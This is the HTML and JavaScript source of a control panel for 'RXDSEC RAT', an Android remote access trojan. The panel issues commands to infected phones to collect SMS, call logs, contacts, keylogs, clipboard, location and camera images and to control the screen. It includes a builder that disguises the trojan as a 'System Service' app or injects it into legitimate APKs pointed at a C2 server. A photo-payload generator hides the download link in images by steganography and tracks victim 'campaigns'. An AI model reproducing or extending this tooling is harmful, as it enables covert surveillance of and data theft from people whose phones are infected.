<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>RXDSEC RAT - Advanced Remote Access Tool</title>
    <!-- Google Fonts -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@400;500;600;700;800;900&family=Rajdhani:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    <!-- Bootstrap and FontAwesome -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <!-- Custom Cyberpunk CSS -->
    <link rel="stylesheet" href="/assets/css/cyberpunk.css">
</head>
<body>
    <div class="cyberpunk-container">
        <!-- RXDSEC RAT Banner -->
        <div class="neon-banner">
            <h1 class="glitch" data-text="RXDSEC RAT">RXDSEC RAT</h1>
            <div class="tagline">Advanced Android Remote Administration Tool</div>
            <div class="author">Developed by @rxdsec on Telegram</div>
        </div>

        <!-- Navigation tabs removed as requested -->

        <div class="row">
            <!-- Sidebar -->
            <div class="col-md-3">
                <div class="cyber-panel">
                    <div class="cyber-panel-header">
                        <h2>CONNECTED DEVICES</h2>
                        <button class="cyber-button" id="refresh-btn"><i class="fas fa-sync-alt"></i></button>
                    </div>
                    <div class="cyber-panel-content">
                        <ul class="list-unstyled" id="device-list">
                            <!-- Devices will be listed here -->
                        </ul>
                        <div id="no-devices-message" class="text-center mt-3">
                            <p class="text-muted">No devices connected</p>
                        </div>
                    </div>
                </div>

                <div class="cyber-panel mt-4">
                    <div class="cyber-panel-header">
                        <h2>SERVER STATUS</h2>
                    </div>
                    <div class="cyber-panel-content">
                        <div class="d-flex justify-content-between mb-2">
                            <span>Uptime:</span>
                            <span id="server-uptime">00:00:00</span>
                        </div>
                        <div class="d-flex justify-content-between mb-2">
                            <span>Connected Devices:</span>
                            <span id="device-count">0</span>
                        </div>
                        <div class="d-flex justify-content-between mb-2">
                            <span>Active Commands:</span>
                            <span id="command-count">0</span>
                        </div>
                        <div class="d-flex justify-content-between">
                            <span>Server Version:</span>
                            <span>2.0.0</span>
                        </div>
                    </div>
                </div>
            </div>

            <!-- Main content -->
            <div class="col-md-9">
                <!-- Device Status Panel -->
                <div class="cyber-panel">
                    <div class="cyber-panel-header">
                        <h2>DEVICE CONTROL</h2>
                        <div>
                            <span class="status-indicator status-offline" id="device-status-indicator"></span>
                            <span id="selected-device-name">No Device Selected</span>
                        </div>
                    </div>
                    <div class="cyber-panel-content">
                        <div id="device-status">
                            <p class="text-center text-muted">Select a device to view details</p>
                        </div>
                    </div>
                </div>

                <!-- Tabs Navigation -->
                <div class="cyber-panel mt-4">
                    <div class="nav nav-tabs" id="device-tabs" role="tablist">
                        <button class="nav-link active" id="command-tab" data-bs-toggle="tab" data-bs-target="#command" type="button" role="tab">Terminal</button>
                        <button class="nav-link" id="screen-tab" data-bs-toggle="tab" data-bs-target="#screen" type="button" role="tab">Screen</button>
                        <button class="nav-link" id="files-tab" data-bs-toggle="tab" data-bs-target="#files" type="button" role="tab">Files</button>
                        <button class="nav-link" id="apps-tab" data-bs-toggle="tab" data-bs-target="#apps" type="button" role="tab">Apps</button>
                        <button class="nav-link" id="payload-tab" data-bs-toggle="tab" data-bs-target="#payload" type="button" role="tab">Payload Builder</button>
                        <button class="nav-link" id="photo-payload-tab" data-bs-toggle="tab" data-bs-target="#photo-payload" type="button" role="tab">Photo Payload</button>
                    </div>
                    
                    <div class="tab-content p-3" id="device-tabs-content">
                        <!-- Command Terminal Tab -->
                        <div class="tab-pane fade show active" id="command" role="tabpanel">
                            <div class="row">
                                <div class="col-lg-8">
                                    <div class="cyber-terminal" id="command-history">
                                        <div class="cyber-terminal-line">
                                            <span class="cyber-terminal-prefix">rxdsec@matrix:~$</span> RXDSEC RAT v2.0.0 Terminal Ready
                                        </div>
                                        <div class="cyber-terminal-line">
                                            <span class="cyber-terminal-prefix">rxdsec@matrix:~$</span> Select a device and start issuing commands...
                                        </div>
                                    </div>
                                    <div class="input-group mt-3">
                                        <input type="text" class="form-control command-input" id="command-input" placeholder="Enter command...">
                                        <button class="cyber-button" id="send-command-btn">EXECUTE</button>
                                    </div>
                                </div>
                                <div class="col-lg-4">
                                    <h5 class="text-center mb-3" style="color: var(--neon-blue);">QUICK COMMANDS</h5>
                                    <div class="d-grid gap-2">
                                        <button class="cyber-button function-btn" data-command="device_info">Device Info</button>
                                        <button class="cyber-button function-btn" data-command="screenshot">Take Screenshot</button>
                                        <button class="cyber-button function-btn" data-command="camera:front">Front Camera</button>
                                        <button class="cyber-button function-btn" data-command="camera:back">Back Camera</button>
                                        <button class="cyber-button function-btn" data-command="location">Get Location</button>
                                        <button class="cyber-button function-btn" data-command="sms:100">Get SMS</button>
                                        <button class="cyber-button function-btn" data-command="call_logs:100">Call Logs</button>
                                        <button class="cyber-button function-btn" data-command="contacts">Get Contacts</button>
                                        <button class="cyber-button function-btn" data-command="clipboard">Get Clipboard</button>
                                        <button class="cyber-button function-btn" data-command="keylog">Get Keylog Data</button>
                                    </div>
                                </div>
                            </div>
                        </div>
                        
                        <!-- Screen Tab -->
                        <div class="tab-pane fade" id="screen" role="tabpanel">
                            <div class="row">
                                <div class="col-lg-9">
                                    <div class="screenshot-container">
                                        <img id="screenshot-img" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=" class="img-fluid" alt="Device Screen">
                                    </div>
                                </div>
                                <div class="col-lg-3">
                                    <h5 class="text-center mb-3" style="color: var(--neon-blue);">SCREEN CONTROL</h5>
                                    <div class="d-grid gap-2">
                                        <button class="cyber-button function-btn" id="refresh-screen-btn">Refresh Screen</button>
                                        <button class="cyber-button function-btn" id="home-btn" data-command="home">Home</button>
                                        <button class="cyber-button function-btn" id="back-btn" data-command="back">Back</button>
                                        <button class="cyber-button function-btn" id="recents-btn" data-command="openRecentApps">Recent Apps</button>
                                        <button class="cyber-button function-btn" id="notifications-btn" data-command="openNotifications">Notifications</button>
                                        <hr>
                                        <div class="row mb-2">
                                            <div class="col-6">
                                                <input type="text" class="form-control" id="touch-x" placeholder="X">
                                            </div>
                                            <div class="col-6">
                                                <input type="text" class="form-control" id="touch-y" placeholder="Y">
                                            </div>
                                        </div>
                                        <button class="cyber-button" id="touch-btn">TAP COORDINATES</button>
                                        <hr>
                                        <input type="text" class="form-control mb-2" id="input-text" placeholder="Text to input">
                                        <button class="cyber-button" id="input-text-btn">INPUT TEXT</button>
                                    </div>
                                </div>
                            </div>
                        </div>
                        
                        <!-- Files Tab -->
                        <div class="tab-pane fade" id="files" role="tabpanel">
                            <h5 class="mb-3" style="color: var(--neon-blue);">FILE EXPLORER</h5>
                            <div class="file-explorer">
                                <p class="text-muted">Select a device to browse files</p>
                            </div>
                        </div>
                        
                        <!-- Apps Tab -->
                        <div class="tab-pane fade" id="apps" role="tabpanel">
                            <h5 class="mb-3" style="color: var(--neon-blue);">INSTALLED APPLICATIONS</h5>
                            <div class="app-list">
                                <p class="text-muted">Select a device to view installed applications</p>
                            </div>
                        </div>
                        
                        <!-- Payload Builder Tab -->
                        <div class="tab-pane fade" id="payload" role="tabpanel">
                            <div class="row">
                                <div class="col-12">
                                    <h5 class="mb-3" style="color: var(--neon-blue);">ANDROID PAYLOAD GENERATOR</h5>
                                    
                                    <ul class="nav nav-tabs" id="payload-tabs" role="tablist">
                                        <li class="nav-item" role="presentation">
                                            <button class="nav-link active" id="standalone-tab" data-bs-toggle="tab" data-bs-target="#standalone" type="button" role="tab">Standalone APK</button>
                                        </li>
                                        <li class="nav-item" role="presentation">
                                            <button class="nav-link" id="binding-tab" data-bs-toggle="tab" data-bs-target="#binding" type="button" role="tab">APK Binding</button>
                                        </li>
                                    </ul>
                                    
                                    <div class="tab-content mt-3" id="payload-tabs-content">
                                        <!-- Standalone APK Tab -->
                                        <div class="tab-pane fade show active" id="standalone" role="tabpanel">
                                            <div class="cyber-panel">
                                                <div class="cyber-panel-header">
                                                    <h2>STANDALONE APK</h2>
                                                </div>
                                                <div class="cyber-panel-content">
                                                    <form id="standalone-form">
                                                        <div class="mb-3">
                                                            <label for="app-name" class="form-label">Application Name</label>
                                                            <input type="text" class="form-control" id="app-name" value="System Service">
                                                        </div>
                                                        <div class="mb-3">
                                                            <label for="c2-server" class="form-label">C2 Server URL</label>
                                                            <input type="text" class="form-control" id="c2-server" value="http://localhost:5000">
                                                        </div>
                                                        <div class="mb-3">
                                                            <label for="app-icon" class="form-label">Application Icon (Optional)</label>
                                                            <input type="file" class="form-control" id="app-icon">
                                                        </div>
                                                        <button type="button" class="cyber-button" id="build-standalone-btn">BUILD APK</button>
                                                    </form>
                                                </div>
                                            </div>
                                        </div>
                                        
                                        <!-- APK Binding Tab -->
                                        <div class="tab-pane fade" id="binding" role="tabpanel">
                                            <div class="cyber-panel">
                                                <div class="cyber-panel-header">
                                                    <h2>APK BINDING</h2>
                                                </div>
                                                <div class="cyber-panel-content">
                                                    <form id="binding-form">
                                                        <div class="mb-3">
                                                            <label for="legitimate-apk" class="form-label">Legitimate APK</label>
                                                            <input type="file" class="form-control" id="legitimate-apk">
                                                        </div>
                                                        <div class="mb-3">
                                                            <label for="c2-server-binding" class="form-label">C2 Server URL</label>
                                                            <input type="text" class="form-control" id="c2-server-binding" value="http://localhost:5000">
                                                        </div>
                                                        <div class="form-check mb-3">
                                                            <input class="form-check-input" type="checkbox" value="" id="preserve-functionality" checked>
                                                            <label class="form-check-label" for="preserve-functionality">
                                                                Preserve App Functionality
                                                            </label>
                                                        </div>
                                                        <button type="button" class="cyber-button" id="build-binding-btn">INJECT RAT</button>
                                                    </form>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    
                                    <!-- Build Progress -->
                                    <div class="cyber-panel mt-3" id="build-progress-container" style="display: none;">
                                        <div class="cyber-panel-header">
                                            <h2>BUILD PROGRESS</h2>
                                        </div>
                                        <div class="cyber-panel-content">
                                            <div class="progress mb-3">
                                                <div class="progress-bar bg-info" role="progressbar" id="build-progress-bar" style="width: 0%"></div>
                                            </div>
                                            <div id="build-status-message">Initializing build...</div>
                                            <div id="build-result" class="mt-3"></div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        
                        <!-- Photo Payload Tab -->
                        <div class="tab-pane fade" id="photo-payload" role="tabpanel">
                            <div class="row">
                                <div class="col-12">
                                    <h5 class="mb-3" style="color: var(--neon-blue);">PHOTO-BASED PAYLOAD GENERATOR</h5>
                                    
                                    <div class="cyber-panel">
                                        <div class="cyber-panel-header">
                                            <h2>CREATE PHOTO PAYLOAD</h2>
                                        </div>
                                        <div class="cyber-panel-content">
                                            <div class="row">
                                                <div class="col-md-6">
                                                    <form id="photo-payload-form">
                                                        <div class="mb-3">
                                                            <label for="apk-url" class="form-label">APK URL (Optional)</label>
                                                            <input type="text" class="form-control" id="apk-url" placeholder="Leave empty to use most recent APK">
                                                            <small class="form-text text-muted">If empty, most recent APK will be used</small>
                                                        </div>
                                                        
                                                        <div class="mb-3">
                                                            <label for="campaign-id" class="form-label">Campaign ID (Optional)</label>
                                                            <input type="text" class="form-control" id="campaign-id" placeholder="Auto-generated if not specified">
                                                            <small class="form-text text-muted">For tracking different deployment campaigns</small>
                                                        </div>
                                                        
                                                        <div class="mb-3">
                                                            <label for="embed-type" class="form-label">Embedding Method</label>
                                                            <select class="form-select" id="embed-type">
                                                                <option value="qr_visible">Visible QR Code</option>
                                                                <option value="qr_hidden">Hidden QR Code (Steganography)</option>
                                                                <option value="metadata_only">Metadata Only</option>
                                                            </select>
                                                            <small class="form-text text-muted">How the payload URL will be embedded in the image</small>
                                                        </div>
                                                        
                                                        <div class="mb-3">
                                                            <label for="encryption-level" class="form-label">Encryption Level</label>
                                                            <select class="form-select" id="encryption-level">
                                                                <option value="none">None</option>
                                                                <option value="low">Low</option>
                                                                <option value="medium" selected>Medium</option>
                                                                <option value="high">High</option>
                                                            </select>
                                                            <small class="form-text text-muted">Encryption applied to the payload URL</small>
                                                        </div>
                                                        
                                                        <div class="mb-3 form-check">
                                                            <input type="checkbox" class="form-check-input" id="randomize-metadata" checked>
                                                            <label class="form-check-label" for="randomize-metadata">Randomize Image Metadata</label>
                                                            <small class="d-block form-text text-muted">Adds realistic camera metadata to enhance stealth</small>
                                                        </div>
                                                        
                                                        <div class="mb-3">
                                                            <label for="target-info" class="form-label">Target Information (Optional)</label>
                                                            <textarea class="form-control" id="target-info" rows="2" placeholder="Notes about the target"></textarea>
                                                            <small class="form-text text-muted">For your reference only, not embedded in the photo</small>
                                                        </div>
                                                        
                                                        <div class="mb-3">
                                                            <label for="template-image" class="form-label">Template Image</label>
                                                            <input type="file" class="form-control" id="template-image" accept="image/*">
                                                            <small class="form-text text-muted">Image to embed the payload into (optional)</small>
                                                        </div>
                                                        
                                                        <button type="button" class="cyber-button" id="generate-photo-btn">GENERATE PHOTO</button>
                                                    </form>
                                                </div>
                                                <div class="col-md-6">
                                                    <div class="preview-container">
                                                        <h4 class="mb-3" style="color: var(--neon-blue);">PHOTO PREVIEW</h4>
                                                        <div id="photo-preview" class="text-center mb-3">
                                                            <p class="text-muted">Photo will appear here after generation</p>
                                                        </div>
                                                        <div id="photo-payload-info" class="d-none">
                                                            <div class="mb-3" id="download-container">
                                                                <button class="cyber-button w-100" id="download-photo-btn">DOWNLOAD PHOTO</button>
                                                            </div>
                                                            <div class="cyber-panel">
                                                                <div class="cyber-panel-header">
                                                                    <h3>PAYLOAD DETAILS</h3>
                                                                </div>
                                                                <div class="cyber-panel-content">
                                                                    <div class="d-flex justify-content-between mb-2">
                                                                        <span>Campaign ID:</span>
                                                                        <span id="payload-campaign-id"></span>
                                                                    </div>
                                                                    <div class="d-flex justify-content-between mb-2">
                                                                        <span>Embed Type:</span>
                                                                        <span id="payload-embed-type"></span>
                                                                    </div>
                                                                    <div class="d-flex justify-content-between mb-2">
                                                                        <span>Encryption:</span>
                                                                        <span id="payload-encryption"></span>
                                                                    </div>
                                                                    <div class="d-flex justify-content-between mb-2">
                                                                        <span>File Size:</span>
                                                                        <span id="payload-size"></span>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    
                                    <div class="cyber-panel mt-4">
                                        <div class="cyber-panel-header">
                                            <h2>CAMPAIGN STATISTICS</h2>
                                        </div>
                                        <div class="cyber-panel-content">
                                            <div class="table-responsive">
                                                <table class="table table-dark table-bordered">
                                                    <thead>
                                                        <tr>
                                                            <th>Campaign ID</th>
                                                            <th>Creation Date</th>
                                                            <th>Views</th>
                                                            <th>Installations</th>
                                                            <th>Conversion</th>
                                                            <th>Actions</th>
                                                        </tr>
                                                    </thead>
                                                    <tbody id="campaigns-table-body">
                                                        <tr>
                                                            <td colspan="6" class="text-center">No campaigns yet</td>
                                                        </tr>
                                                    </tbody>
                                                </table>
                                            </div>
                                            <button type="button" class="cyber-button mt-3" id="refresh-campaigns-btn">REFRESH CAMPAIGNS</button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdn.socket.io/4.4.1/socket.io.min.js"></script>
    <script src="/assets/js/main.js"></script>
    <script>
        // Initialization code for page elements
        document.addEventListener('DOMContentLoaded', function() {
            // Initialize uptime counter
            let uptimeCounter = 0;
            setInterval(() => {
                uptimeCounter++;
                const hours = Math.floor(uptimeCounter / 3600);
                const minutes = Math.floor((uptimeCounter % 3600) / 60);
                const seconds = uptimeCounter % 60;
                document.getElementById('server-uptime').textContent = 
                    `${hours.toString().padStart(2, '0')}:${minutes.toString().padStart(2, '0')}:${seconds.toString().padStart(2, '0')}`;
            }, 1000);
            
            // Wait until the socket is initialized in main.js
            setTimeout(() => {
                // Additional socket.io event handlers that aren't in main.js
                if (typeof socket !== 'undefined') {
                    socket.on('build_complete', (data) => {
                        console.log('Build complete:', data);
                        buildComplete(data);
                    });
                    
                    socket.on('build_error', (data) => {
                        console.log('Build error:', data);
                        buildError(data);
                    });
                    
                    socket.on('server_status', (data) => {
                        console.log('Server status:', data);
                        updateServerStatus(data);
                    });
                }
            }, 1000); // Give main.js time to initialize socket
        });
        
        // Global variables
        let selectedDeviceId = null;
        
        // Update device list in the sidebar
        function updateDeviceList(devices) {
            const deviceList = document.getElementById('device-list');
            const noDevicesMessage = document.getElementById('no-devices-message');
            const deviceCount = document.getElementById('device-count');
            
            deviceList.innerHTML = '';
            deviceCount.textContent = devices.length;
            
            if (devices.length > 0) {
                noDevicesMessage.style.display = 'none';
                
                devices.forEach(device => {
                    const lastSeen = new Date(device.last_seen);
                    const timeAgo = getTimeAgo(lastSeen);
                    
                    const listItem = document.createElement('li');
                    listItem.className = 'mb-2';
                    listItem.innerHTML = `
                        <div class="cyber-panel device-item" data-device-id="${device.device_id}">
                            <div class="p-2">
                                <div class="d-flex align-items-center">
                                    <span class="status-indicator ${timeAgo.minutes < 5 ? 'status-online' : 'status-offline'}"></span>
                                    <strong class="ms-2" style="color: var(--neon-blue);">${device.device_id.substring(0, 8)}...</strong>
                                </div>
                                <div class="small text-muted mt-1">Last seen: ${timeAgo.text}</div>
                                <div class="small text-muted">${device.ip_address}</div>
                                <div class="small text-muted">Pending commands: ${device.pending_commands}</div>
                            </div>
                        </div>
                    `;
                    
                    listItem.querySelector('.device-item').addEventListener('click', () => {
                        selectDevice(device.device_id);
                    });
                    
                    deviceList.appendChild(listItem);
                });
                
                // If the selected device is no longer in the list, clear selection
                if (selectedDeviceId) {
                    const stillExists = devices.some(device => device.device_id === selectedDeviceId);
                    if (!stillExists) {
                        selectDevice(null);
                    }
                }
                
            } else {
                noDevicesMessage.style.display = 'block';
            }
        }
        
        // Select a device
        function selectDevice(deviceId) {
            selectedDeviceId = deviceId;
            
            // Update UI to show selected device
            document.querySelectorAll('.device-item').forEach(item => {
                item.classList.remove('active');
            });
            
            if (deviceId) {
                document.querySelector(`.device-item[data-device-id="${deviceId}"]`)?.classList.add('active');
                document.getElementById('selected-device-name').textContent = `Device: ${deviceId.substring(0, 10)}...`;
                document.getElementById('device-status-indicator').className = 'status-indicator status-online';
                
                // Clear command history
                document.getElementById('command-history').innerHTML = `
                    <div class="cyber-terminal-line">
                        <span class="cyber-terminal-prefix">rxdsec@${deviceId.substring(0, 8)}:~$</span> Device connected
                    </div>
                    <div class="cyber-terminal-line">
                        <span class="cyber-terminal-prefix">rxdsec@${deviceId.substring(0, 8)}:~$</span> Ready for commands
                    </div>
                `;
                
                // Load device data
                loadDeviceData(deviceId);
            } else {
                document.getElementById('selected-device-name').textContent = 'No Device Selected';
                document.getElementById('device-status-indicator').className = 'status-indicator status-offline';
                document.getElementById('device-status').innerHTML = '<p class="text-center text-muted">Select a device to view details</p>';
                document.getElementById('command-history').innerHTML = `
                    <div class="cyber-terminal-line">
                        <span class="cyber-terminal-prefix">rxdsec@matrix:~$</span> RXDSEC RAT v2.0.0 Terminal Ready
                    </div>
                    <div class="cyber-terminal-line">
                        <span class="cyber-terminal-prefix">rxdsec@matrix:~$</span> Select a device and start issuing commands...
                    </div>
                `;
            }
        }
        
        // Load device data
        function loadDeviceData(deviceId) {
            // This would typically be an API call to get device details
            document.getElementById('device-status').innerHTML = `<p class="text-center">Loading device data...</p>`;
            
            // For demo purposes, just show a placeholder
            setTimeout(() => {
                document.getElementById('device-status').innerHTML = `
                    <div class="row">
                        <div class="col-md-6">
                            <p><strong>Device ID:</strong> ${deviceId}</p>
                            <p><strong>Status:</strong> <span class="badge bg-success">Online</span></p>
                            <p><strong>Model:</strong> Unknown</p>
                            <p><strong>Android Version:</strong> Unknown</p>
                        </div>
                        <div class="col-md-6">
                            <p><strong>Battery:</strong> Unknown</p>
                            <p><strong>Network:</strong> Unknown</p>
                            <p><strong>Root Access:</strong> Unknown</p>
                            <p><strong>Screen Status:</strong> Unknown</p>
                        </div>
                    </div>
                `;
            }, 500);
        }
        
        // Add command to history
        function addToCommandHistory(text) {
            const commandHistory = document.getElementById('command-history');
            const line = document.createElement('div');
            line.className = 'cyber-terminal-line';
            
            const prefix = document.createElement('span');
            prefix.className = 'cyber-terminal-prefix';
            prefix.textContent = selectedDeviceId ? 
                `rxdsec@${selectedDeviceId.substring(0, 8)}:~$` : 
                'rxdsec@matrix:~$';
            
            line.appendChild(prefix);
            line.appendChild(document.createTextNode(' ' + text));
            
            commandHistory.appendChild(line);
            commandHistory.scrollTop = commandHistory.scrollHeight;
        }
        
        // Display command result
        function displayCommandResult(data) {
            const commandHistory = document.getElementById('command-history');
            const line = document.createElement('div');
            line.className = 'cyber-terminal-line';
            
            let resultText = data.result;
            if (typeof resultText === 'object') {
                resultText = JSON.stringify(resultText, null, 2);
            }
            
            line.textContent = resultText;
            
            commandHistory.appendChild(line);
            commandHistory.scrollTop = commandHistory.scrollHeight;
            
            // Special handling for screenshots
            if (data.type === 'screenshot' && data.data) {
                document.getElementById('screenshot-img').src = `data:image/jpeg;base64,${data.data}`;
            }
        }
        
        // Update build progress
        // All these functions have been moved to main.js
        // This ensures a cleaner separation of code
        
        // Utility function to get time ago
        function getTimeAgo(date) {
            const seconds = Math.floor((new Date() - date) / 1000);
            
            let interval = Math.floor(seconds / 31536000);
            if (interval > 1) {
                return { text: interval + ' years ago', minutes: seconds / 60 };
            }
            
            interval = Math.floor(seconds / 2592000);
            if (interval > 1) {
                return { text: interval + ' months ago', minutes: seconds / 60 };
            }
            
            interval = Math.floor(seconds / 86400);
            if (interval > 1) {
                return { text: interval + ' days ago', minutes: seconds / 60 };
            }
            
            interval = Math.floor(seconds / 3600);
            if (interval > 1) {
                return { text: interval + ' hours ago', minutes: seconds / 60 };
            }
            
            interval = Math.floor(seconds / 60);
            if (interval > 1) {
                return { text: interval + ' minutes ago', minutes: interval };
            }
            
            return { text: 'Just now', minutes: 0 };
        }
        
        // Event listeners
        document.addEventListener('DOMContentLoaded', () => {
            // Refresh button
            document.getElementById('refresh-btn').addEventListener('click', () => {
                fetch('/api/devices')
                    .then(response => response.json())
                    .then(data => {
                        if (data.status === 'ok') {
                            updateDeviceList(data.devices);
                        }
                    })
                    .catch(error => console.error('Error fetching devices:', error));
            });
            
            // Send command button
            document.getElementById('send-command-btn').addEventListener('click', () => {
                const commandInput = document.getElementById('command-input');
                const command = commandInput.value.trim();
                
                if (command && selectedDeviceId) {
                    socket.emit('send_command', {
                        device_id: selectedDeviceId,
                        command: command
                    });
                    
                    addToCommandHistory(command);
                    commandInput.value = '';
                }
            });
            
            // Command input enter key
            document.getElementById('command-input').addEventListener('keydown', (e) => {
                if (e.key === 'Enter') {
                    document.getElementById('send-command-btn').click();
                }
            });
            
            // Quick command buttons
            document.querySelectorAll('.function-btn').forEach(button => {
                button.addEventListener('click', () => {
                    if (selectedDeviceId) {
                        const command = button.getAttribute('data-command');
                        if (command) {
                            socket.emit('send_command', {
                                device_id: selectedDeviceId,
                                command: command
                            });
                            
                            addToCommandHistory(command);
                        }
                    } else {
                        alert('Please select a device first');
                    }
                });
            });
            
            // Screen refresh button
            document.getElementById('refresh-screen-btn').addEventListener('click', () => {
                if (selectedDeviceId) {
                    socket.emit('send_command', {
                        device_id: selectedDeviceId,
                        command: 'screenshot'
                    });
                    
                    addToCommandHistory('screenshot');
                } else {
                    alert('Please select a device first');
                }
            });
            
            // Touch button
            document.getElementById('touch-btn').addEventListener('click', () => {
                if (selectedDeviceId) {
                    const x = document.getElementById('touch-x').value.trim();
                    const y = document.getElementById('touch-y').value.trim();
                    
                    if (x && y) {
                        const command = `touch:${x},${y}`;
                        socket.emit('send_command', {
                            device_id: selectedDeviceId,
                            command: command
                        });
                        
                        addToCommandHistory(command);
                    } else {
                        alert('Please enter both X and Y coordinates');
                    }
                } else {
                    alert('Please select a device first');
                }
            });
            
            // Text input button
            document.getElementById('input-text-btn').addEventListener('click', () => {
                if (selectedDeviceId) {
                    const text = document.getElementById('input-text').value.trim();
                    
                    if (text) {
                        const command = `input_text:${text}`;
                        socket.emit('send_command', {
                            device_id: selectedDeviceId,
                            command: command
                        });
                        
                        addToCommandHistory(command);
                        document.getElementById('input-text').value = '';
                    } else {
                        alert('Please enter text to input');
                    }
                } else {
                    alert('Please select a device first');
                }
            });
            
            // Build standalone APK button
            document.getElementById('build-standalone-btn').addEventListener('click', () => {
                const appName = document.getElementById('app-name').value.trim();
                const c2Server = document.getElementById('c2-server').value.trim();
                const appIconInput = document.getElementById('app-icon');
                
                let appIcon = null;
                if (appIconInput.files.length > 0) {
                    const reader = new FileReader();
                    reader.onload = function(e) {
                        appIcon = e.target.result.split(',')[1]; // Get base64 part
                        
                        // Emit build request
                        socket.emit('build_payload', {
                            type: 'standalone',
                            config: {
                                appName: appName,
                                c2Server: c2Server,
                                appIcon: appIcon
                            }
                        });
                    };
                    reader.readAsDataURL(appIconInput.files[0]);
                } else {
                    // Emit build request without icon
                    socket.emit('build_payload', {
                        type: 'standalone',
                        config: {
                            appName: appName,
                            c2Server: c2Server
                        }
                    });
                }
                
                // Reset build UI
                document.getElementById('build-progress-container').style.display = 'block';
                document.getElementById('build-progress-bar').style.width = '0%';
                document.getElementById('build-progress-bar').className = 'progress-bar bg-info';
                document.getElementById('build-status-message').textContent = 'Initializing build...';
                document.getElementById('build-result').innerHTML = '';
            });
            
            // Build binding APK button
            document.getElementById('build-binding-btn').addEventListener('click', () => {
                const c2Server = document.getElementById('c2-server-binding').value.trim();
                const preserveFunctionality = document.getElementById('preserve-functionality').checked;
                const legitimateApkInput = document.getElementById('legitimate-apk');
                
                if (legitimateApkInput.files.length > 0) {
                    const reader = new FileReader();
                    reader.onload = function(e) {
                        const apkData = e.target.result.split(',')[1]; // Get base64 part
                        
                        // Emit build request
                        socket.emit('build_payload', {
                            type: 'binding',
                            config: {
                                legitimateApk: {
                                    name: legitimateApkInput.files[0].name,
                                    data: apkData
                                },
                                c2Server: c2Server,
                                preserveFunctionality: preserveFunctionality
                            }
                        });
                    };
                    reader.readAsDataURL(legitimateApkInput.files[0]);
                } else {
                    alert('Please select a legitimate APK file');
                }
                
                // Reset build UI
                document.getElementById('build-progress-container').style.display = 'block';
                document.getElementById('build-progress-bar').style.width = '0%';
                document.getElementById('build-progress-bar').className = 'progress-bar bg-info';
                document.getElementById('build-status-message').textContent = 'Initializing build...';
                document.getElementById('build-result').innerHTML = '';
            });
            
            // Initial API call to get devices
            fetch('/api/devices')
                .then(response => response.json())
                .then(data => {
                    if (data.status === 'ok') {
                        updateDeviceList(data.devices);
                    }
                })
                .catch(error => console.error('Error fetching devices:', error));
        });
    </script>
</body>
</html>